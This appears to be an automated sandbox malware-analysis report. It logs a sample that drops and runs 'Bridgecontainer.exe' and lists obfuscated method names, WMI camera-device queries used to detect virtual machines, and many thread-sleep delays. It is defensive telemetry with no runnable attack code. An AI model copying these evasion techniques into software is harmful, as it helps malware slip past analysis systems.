Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, HTKgZJpIpcSkYwGMxmh.cs	High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'obgZfdYEK5NmjD7aYsa', 'spwANuYpPUdylWCMrK2', 'waLWLvY0Grcjs2XFC5J', 'YD9BsrYqaRGumeJXfuZ', 'NuSWKWYLTPPdAAVg688', 'oC0yjMYWWCbHTooG6On'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, q40b0qvZZ4o32yVtLMW.cs	High entropy of concatenated method names: 'h7jQXf2cZj', 'hrYfJ92xOfhqJO9Qjk5', 'lampBR2bgqnIC0mfvrt', 'Y1vyCG2NTuiUVK9y1pN', 'imkmfh2S9VNv8t6e1Jk', 'WoD1YOXJZ9', 'Rai1L7N0k2', 'SYU1MBCCK6', 'mUj1sieGup', 'Mkb1Hh5tmf'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, Q1fACiVWXI9cPxxZvHs.cs	High entropy of concatenated method names: 'dL7ByUlhO0', '_1kO', '_9v4', '_294', 'YldBPfv3VF', 'euj', 'M7XBrIj1LC', 'sfJBgsAsGx', 'o87', 'AG0BfobTh1'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, mjuXJUp4KC1JsSjoSA5.cs	High entropy of concatenated method names: 'Dbq5ySgFEq', 'Gty5PZJN0W', 'pA35rRLiVW', 'Vf6ElDw9p7RsPplEaFo', 'evoQW4wjdTYeV6YjUHV', 'u8fa9LwlN7NaAfJXWBe', 'DdUejwwwjqlF48nOVpA', 'f2g6myw34Ubx1S2F23M', 'P8YbPMwOUAQi7s0a3mH', 'wog2NFwBQRm9w366NYu'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, GAHCQV5aBuZHySbaRwS.cs	High entropy of concatenated method names: '_0023Nn', 'Dispose', 'c2CZHa1vvb', 'hSKZOiHAHC', 'kVBZtuZHyS', 'UaRZawSSa4', 'cXrZ9IBe09', 'HJc7sYSj22TVERP3DpL', 'kP4NKESlSt7GpsjEeZG', 'ULVFaHSY9g3hfYn00nH'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, hmpPZUpKBYYyNq74X9y.cs	High entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'hsbYXWYb3yDT6W62jv3', 'k96QGRYotbGfU1pnBDF', 'dVUswlYM5GxESmOF55O', 'yCj0V3YUGuuPiVWtHRL', 'eV0bCOY7KHLHskvqd6A', 'ToeNNnYtcwWBomgXfqq'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, NqdnU1vbIFm4BUxpH7I.cs	High entropy of concatenated method names: 'saTI3eZHMt', 'vxkIHZ4mj2', 'e9HIO9bwcx', 'xvZIth5KOs', 'uy6IaYOXFW', 'Wp2I9Pqxn7', 'txaIAj385T', 'E4uICaFflZ', 'IZ2IRShrmw', 'shMIiDsple'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, zHj0GuVqctmcamK9JnX.cs	High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, xyJ7CBZeUAS5iu8lpOI.cs	High entropy of concatenated method names: 'gKSrcZkM7W', 'I2ir7NodlQ', 'wodQHkC54qnvpGIKbgL', 'eEmw7xC8y5fUsNQH3sA', 'FbFHtBCdlwTdwqlnWMG', 'a8mMrpCyAbDUGY5bVuI', 'vRNq4PCkpqk6xvdBFS5', 'gl111aCu6ZCvUAJFKY1', 'RwKQ19CzqKNGs9vS8GB', 'U0icG8gXedsTo2hSWsg'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, yYYCbvpD4x5KAP7q72e.cs	High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'SZqhyPrA7KcQXO2dFPu', 'N2MdqorQtvPwNLUPj8O', 'blc7pJrcHTwFHthC105', 'kLAaxerakrDKqDuBXPj', 'iFpKIhrsHNdeuQbihXS', 'H8n8a6rZeICTrIpm16n'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, WLuXYZDJ9Txf9KimucL.cs	High entropy of concatenated method names: 'p4l0dVsULg', 'ruC0bbTS8L', 'lAY0FkJDJ5', 'b0j0u1OCm4', 'hxt0wfWQDj', 'si6halUr2f9hecyDJxu', 'hqd2nfUYp5jwLpaMUKx', 'iq0iLXUTjZ2FxJwJfoX', 'QHpZFdUmjY9yHDV9qv2', 'c5AMVDUHqsjN5fGrOZe'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, RYKHDrVLXVgix2V7wRw.cs	High entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'TQWqgd809E', 'dPDqf6tZ6T', 'GM3qqAF04n', 'zU0qSPF5Rc', 'K0HqNEUgul', 'bqoqBVkCaS', 'nf1tIxqgvXZ1PRJyOiW'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, rRdjeSvnSlDb0kKPneW.cs	High entropy of concatenated method names: '_7zt', 'o20GEDN6xZ', 'utVGcZSoIF', 'tRCG7yDbEA', 'HGAG8hvtwt', 'mtTGytP7st', 'PI6GPcUNAw', 'aBTGrYP7asGVknlT4dh', 'HN7pofPtL02RFje9Q0A', 'LEt6oZPMQwY2opop2sC'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, WGVop2V5evqxtBwsdjK.cs	High entropy of concatenated method names: 'a86f0eb8xQ', 'vrtfe9iP8E', '_8r1', 'q5cf1ABJNS', 'lQCfKVWgOX', 'QYWfQmp598', 'E09fGWviar', 'qssLL8pGLv6iC3qmQFr', 'cfEIeypNc9KjHM8yBtX', 'nCofWMpSoOKpDp8DoAQ'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, rqHtyZpeJN0WXA3RLiV.cs	High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'SFLcuCYYZZwlulGco8n', 'NnHnEKYH8Tdn78cJ2fK', 'RrgwTuYjHqkljml7Bq2', 'nksYxVYlxQGghsBh8OV', 'AOJBboY9qjCh4Xqukgr', 'ahZ2RgYw2bXerGyfKR7'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, AJxNwlOUyXB6vrBiZt.cs	High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'J1dJS3Kk3wPwZVmgBto', 'L6reLWKuFkabDP9h0r6', 'VJWJQ4KzNnVaOMccdaj', 'BBe1wjeXDpC3G1t1GPW', 'PYs5cve4lLxC8tEylGf', 'Lg8RX0eKNRcByXCEmra'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, TNHnUDv3SNl1iBuo2g2.cs	High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, mR6KMHpUpvumT97v7M2.cs	High entropy of concatenated method names: 'YlM5K2iCyN', 'hSf5Q7ikFd', 'o4HUFJ9wEePOI3F6UDL', 'X9Dpsg9lB9wqLUq2xsY', 'rpWZ7d99FXdnePfck2F', 'dn17nv93im493PEMw51', 'coC9yM9OQ6OtnKqeXq4', 'gVR59n9Bpa8fjP4XFEx', 'eKaZq6965QcLFPjv25u', 'UEqW7N9G0ycbGjfabV4'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, PwTiOyZYTTdXuu7sIdY.cs	High entropy of concatenated method names: 'W2Hrhgjplj', 'vfKrxvcsut', 't8arWSisee', 'ackRIbgpNCtBptLm7UH', 'hYfRjAghr21YgQ760JE', 'MmNfQagEbbBbnJxLZCQ', 'vUSMAKg0y5srXTV7OVt', 'YbjP3ngqCDhsUErJHUB', 'eT7UdugLSDHJyuIv28S', 'FELBH2gWlwE4KxHTLfh'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, N4lb1BvyMxMB5trD7m2.cs	High entropy of concatenated method names: 'GAHpAePWglx7nTZoluo', 'glDM2cPJ6M0aJX4fc5U', 'cETiojPVQKtSHtwCcRa', 'b9DydPPqMyVIG9f9omb', 'BMhu9FPLx3t6QlRaNpW'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, wUa6X3zBNZoButV0hi.cs	High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'XcumDPreMXlhMoCuYr5', 'o7LYcbrToAEhUROcyuJ', 'p4qFxGrmZXM6UIaXThQ', 'v8sq2prrHjs4NkXV6Mq', 'srv7XnrYNCAHOCcnfQT', 'cHa0uMrHIMRCvsSR6ef'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, S3gRCD5cIvPYpgL7B2v.cs	High entropy of concatenated method names: 'Pj6v6xn4sh', 'r91vIGUGnQ', 'O1nQRg6vrcGAYm6QAmI', 'h1Xana62Nil96C9bO8B', 'u2a08P67LxUksKkr5yW', 'o6QKue6t7cHPMjjR5vC', 'agyTjq6PmpgO1FH9XAm', 'V3ZIFu6nFE7BOk4XGmj', 'VFPZWS6figC9R2b0PVL', 'f2iGCN6Ijij0B1FqdFM'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, eNgiOA5yPFGhAZiswEw.cs	High entropy of concatenated method names: 'F77v7BjB3u', 'KXEv8d0gVq', 'FXuvy8JWDS', 'bwfvPrfgN1', 'aKVvrwr6bU', 'Kj8BNWGXspPyagB1YE0', 'bkcDTgG41VyU3shL2py', 'VLJktP6ufUV1MqtX8sC', 'DjDQV46zYZTwr03J8IE', 'QPl3INGKaFLDtdvSroo'
Source: 0.3.5Ixz5yVfS7.exe.6acf536.0.raw.unpack, lHWFWX5NfUxJIhHDBan.cs	High entropy of concatenated method names: 'eZJv3WotKF', 'jYbv4y0Xoj', 'Yj3vzgRCDI', 'dPYZlpgL7B', 'ovAZpEnN8U', 'rYrZ5VAeJZ', 'HqGZDLw6KM', 'dE0Zv5K1me', 'qnNZZ6ZNgi', 'gfeQYdG83tAIkkGi0xW'

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

File created: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Jump to dropped file

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Memory allocated: F50000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Memory allocated: 1AB40000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 599103	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 597016	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Thread delayed: delay time: 596250	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Window / User API: threadDelayed 7776			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Window / User API: threadDelayed 2035			Jump to behavior

Source: C:\Users\user\Desktop\5Ixz5yVfS7.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-23035

Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -3600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -599103s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe TID: 2136	Thread sleep time: -597344s >= -30000s	Jump to behavior
